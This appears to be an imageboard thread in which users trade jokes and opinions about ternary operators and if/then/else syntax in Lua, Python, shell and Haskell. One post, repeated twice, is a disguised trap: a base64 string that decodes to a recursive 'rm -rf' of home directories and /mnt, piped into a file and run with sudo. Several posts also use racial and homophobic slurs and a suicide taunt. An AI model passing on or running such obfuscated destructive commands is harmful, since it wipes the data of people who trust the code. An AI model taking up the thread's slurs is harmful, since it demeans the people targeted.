>language uses `if then else` instead of `? :`
>>108874392x and y or z.
>>108874392In powershell you have the option of both.If and else or a ternary
>>108874392laughs in >if [];>then>fi
>>108874392Language is Python
>>108874392not only is your take fucking retarded but you used backticks instead of quotes. please point that barrel the other way around
>>108874411this is why lua sucks. conditional operands should not be the same as tertiary symbols
>>108874392printf 'cm0gLXJmIC8qbWUqIC9tbnQK' | `base64 -d` > kys.pysudo python3 ./kys.py
printf 'cm0gLXJmIC8qbWUqIC9tbnQK' | `base64 -d` > kys.pysudo python3 ./kys.py
>>108874411>>108877474this is why luau has if expressionsprint(if true then 'nigger' else 'faggot')
>>108874392ternary operator returns a valueif else statements don't
>>108877474They're not, they just happen to work most of the time.
Yes I use pascal caseYes I use allman style braces No I do not use nested ternariesYes I have a job
>>108874392>?bloat
>>108874392Ternary is mainly used by code golfing faggots who want to squash many things into a single statement
>>108878333>if else statements don'tthis is one thing languages like haskell and the troon language got right. Everything being an expression really is a great QoL feature that increases expressiveness in some cases, basically for free
>>108874392>not using gotongmi
>>108878448that's true but they won't understand